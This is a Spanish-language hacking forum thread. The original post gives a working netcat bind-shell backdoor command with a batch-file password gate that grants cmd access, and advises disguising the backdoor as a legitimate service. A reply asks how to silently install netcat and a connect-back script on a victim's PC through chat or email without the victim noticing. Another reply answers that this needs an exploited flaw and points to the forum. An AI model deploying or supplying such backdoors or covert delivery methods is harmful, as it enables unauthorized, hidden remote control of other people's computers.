Supongamos que tenemos una backdoor con netcat a la escucha en algun puerto de alguna computadora en algun lugar... y no queremos que cualquiera de casualidad se conecte a ese puerto y como por arte de magia le caiga del cielo una shell xD es por eso que le vamos a poner una peticion de contraseña antes de que nc nos brinde la shell..
hacemos un...
nc -d -L -e login.bat -p 777
y en el login.bat
@echo off
echo Esta es una backdoor privada xD
echo Password:
echo.
set /p pass=
if %pass%==password (cmd) else (exit)
Obviamente no vais a ser tan obvios de decir "hey eso es una backdoor jajaj" pero puedes simular ser un servicio, o hacer un pequeño server con batch o con wscript o con cualquiera que se te ocurra (nombro batch y wscript porque son los que hay en casi todos los PC) puedes usar la funcion GetPassword de wscript en vez del .bat...
La idea era hacernos recordar que el flag -e del nc no solo cirve para ponerle cmd.exe o /bin/bash xD
En fin, esto es algo extremadamente simple (a veces las cosas simples son lo mas apropiado), pero el limite de netcat esta en el limite de tu imaginación xD
Salu2
Abria una forma de optener la shell de otra pc si q el otro usuario se de cuenta... es decir enviar un especie de autoejecutable para que instale slenciosamente el netcat y una line a comandos en .bat para que conecte con nustro servidor..
d que forma lo enviaria silenciosamente a travez de una conversacion o un correo electronico...
como ago el autoejecutable?
saludos...
Anteriormente habia hecho algo similar con el netcat, pero redireccionaba a un "/usr/loca/bin/gdb" Esto con un usuario muy restringido.
Estaba genial!!
sii, estas pabadas con nc alguna vez siempre nos terminan salvand0 cuando estam0s un poco acorralados en el medio de un pentest xD jajja
@Dr.Make Para que algo se "autoejecute" sin consentimiento del usuario victima, debes aprovechar alguna falla de seguridad xD es muy diferente en cada situación. Lo que describes es algo parecido a lo que hace psexec solo que con este necesitas user/pass...
Busca en el foro, seguro hay algo..
Salu2
Interesante... :)